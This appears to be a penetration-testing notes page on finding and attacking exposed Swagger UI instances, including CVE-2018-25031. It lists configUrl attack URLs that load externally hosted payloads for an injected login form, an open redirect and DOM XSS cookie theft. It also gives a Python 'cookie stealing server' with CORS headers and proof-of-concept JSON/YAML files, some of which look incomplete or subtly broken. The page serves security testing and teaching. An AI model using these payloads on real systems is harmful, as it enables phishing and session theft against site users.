# Swagger UI [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Nuclei template {% embed url="" %} {% embed url="" %} ## Find Exposed Swagger {% embed url="" %} ### Wordlist ``` https://example.com/swagger.yaml https://example.com/swagger.json https://example.com/api-docs https://example.com/v2/api-docs (Swagger 2.0) https://example.com/v3/api-docs (OpenAPI 3) ``` {% embed url="" %} {% embed url="" %} ## OSINT {% embed url="" %} ## Audit endpoints {% embed url="" %} {% content-ref url="rest-api" %} [rest-api](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/rest-api) {% endcontent-ref %} ### Burp Extension Parse OpenAPI documentation using the OpenAPI Parser BApp {% embed url="" %} ## Get versions and their vulnerabilities. {% embed url="" %}

## Find old versions of Swagger-ui vulnerable to various XSS attacks - XSSwagger {% embed url="" %} ## CVE-2018-25031 Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. {% embed url="" %} {% embed url="" %} {% embed url="" %} Test: `/api/docs/?configUrl=https://jumpy-floor.surge.sh/test.json`

### Repo {% embed url="" %} Found Swagger try each of the file of the repo ``` # HTML Injection - Display a login form http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json # Phishing method - Open Redirect - If the victim click on evil.com http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json # DOM XSS http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json http://target.com/api/swagger/ui/index?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json ``` ### Cookie Stealing Server with CORS Header ```python from http.server import SimpleHTTPRequestHandler import socketserver class CORSRequestHandler(SimpleHTTPRequestHandler): def end_headers(self): self.send_header('Access-Control-Allow-Origin', '*') self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS') super().end_headers() if name == "__main__": PORT = 80 with socketserver.TCPServer(("", PORT), CORSRequestHandler) as httpd: print("Serving at port", PORT) httpd.serve_forever() ``` POC: `test.json` ```json { "url": "http://IP/test.yaml", "urls": [ { "url": "http://IP/test.yaml", "name": "Foo" } ] } ``` POC: `test.yaml` ```yaml swagger: '2.0' info: title: XSS Attack BY 0xss0rz description: |

version: production
basePath: /JSSResource/
produces:
 - application/xml
 - application/json
consumes:
 - application/xml
 - application/json
security: - basicAuth: []
paths:
 /M0X0101:
  get:
   responses:
    '200':
     description: No response was specified
   tags: - XSS_D 
   operationId: findAccounts
   summary: Finds all accounts 
 '/hack/hachid/{id}':
  delete:
   parameters:
    - description: | format: int64 
      in: path 
      name: id 
      required: true 
      type: integer 
   responses:
    '200':
      description: No response was specified
``` Could lead to CSS exfiltration

{% embed url=" " %}

## Postman / Scanner

{% embed url=" " %}

```
http://url/swagger/docs/v1
http://url/ /v3/api-docs # JSON file
``` or check source code:

```
const ui = SwaggerUIBundle({
  url: "https://petstore.swagger.io/v2/swagger.json",     // <-------
  dom_id: '#swagger-ui',
```

or dev tool ```
curl -o swagger.yaml https://example.com/swagger.yaml
```

If the swagger is a json file use yq to convert it: `pip install yq` or `apt install yq`

```
curl -s https://example.com/swagger.json | yq -P > swagger.yaml
```

You can now import the yaml file inside Postman or use it in scanner like Zap

{% content-ref url="postman-usage" %}
[postman-usage](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/postman-usage)
{% endcontent-ref %}

{% content-ref url="zap-scanner-and-other-scanning-methods" %}
[zap-scanner-and-other-scanning-methods](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/zap-scanner-and-other-scanning-methods)
{% endcontent-ref %}

### SOAPi

{% embed url=" " %}

### Other Scanners

{% content-ref url="tools-and-scanners" %}
[tools-and-scanners](https://0xss0rz.gitbook.io/0xss0rz/pentest/api/tools-and-scanners)
{% endcontent-ref %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp) ## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Hacking APIs: Breaking Web Application Programming Interfaces**](https://www.amazon.fr/dp/1718502443?tag=0xss0rz-21)\
  A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
* [**Black Hat GraphQL: Attacking Next Generation APIs**](https://www.amazon.fr/dp/B0B7Q8BYG1?tag=0xss0rz-21)\
  This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)